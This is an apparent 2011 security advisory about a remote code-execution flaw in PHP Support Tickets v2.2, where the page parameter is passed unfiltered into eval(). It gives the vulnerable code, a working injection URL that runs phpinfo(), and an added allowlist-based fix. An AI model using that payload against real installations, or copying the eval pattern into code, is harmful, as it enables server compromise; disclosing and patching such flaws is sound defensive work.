PHP Support Tickets v2.2 code execution defect and fix - vulnerability warning - the black bar safety net

2011-09-14T00:00:00
ID MYHACK58:62201131837
Type myhack58
Reporter Anonymous
Modified 2011-09-14T00:00:00

Description

Title: PHP Support Tickets v2.2 Code Exec

Author: brain[pillow]
Developer website: www.phpsupporttickets.com
Affected version: 2.2

Defect code analysis:

/classes/GUI/abstract.GUI.php


public function getPageName() {
    // $this->page (the page request parameter) is concatenated into the eval() string unfiltered
    return eval('return PHPST_PAGENAME_' . strtoupper($this->page) . ';');
}

====================================================================

Test:

/index.php?page=xek();function PHPST_PAGENAME_XEK(){phpinfo();}

Fix: filter the page parameter before it is passed to eval().
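
One way to apply that fix, shown as an added example that is not part of the original advisory or the project's own code: allowlist the page value and look the constant up with constant() instead of eval(). The function name getPageNameSafe, the default title and the two PHPST_PAGENAME_* values are assumptions made for the demonstration.

```php
<?php
// Added example, not the project's code. The constants below are constructed
// stand-ins for the PHPST_PAGENAME_* constants the application defines.
define('PHPST_PAGENAME_HOME', 'Home');
define('PHPST_PAGENAME_VIEWTICKET', 'View ticket');

/**
 * Resolve a page title without eval() (hypothetical helper).
 * Returns the constant's value, or $default when the input is not a plain
 * identifier or no matching constant exists.
 */
function getPageNameSafe($page, $default = 'Unknown page')
{
    // Reject arrays and other non-string input such as ?page[]=x.
    if (!is_string($page)) {
        return $default;
    }
    // Allowlist: letters, digits and underscore only. \A and \z anchor the
    // whole string, so a trailing newline cannot slip past the check.
    if (!preg_match('/\A[A-Za-z0-9_]{1,64}\z/', $page)) {
        return $default;
    }
    $name = 'PHPST_PAGENAME_' . strtoupper($page);
    // constant() is a lookup only; nothing is parsed as PHP code.
    return defined($name) ? constant($name) : $default;
}

// Constructed inputs: a valid page, an unknown page, the string from the
// Test line above, and an array value.
$samples = array(
    'home',
    'nosuchpage',
    'xek();function PHPST_PAGENAME_XEK(){phpinfo();}',
    array('x'),
);
foreach ($samples as $s) {
    printf("%-55s => %s\n", json_encode($s), getPageNameSafe($s));
}
```

Only the first sample resolves to a title; the other three fall through to the default because they either match no defined constant or fail the allowlist.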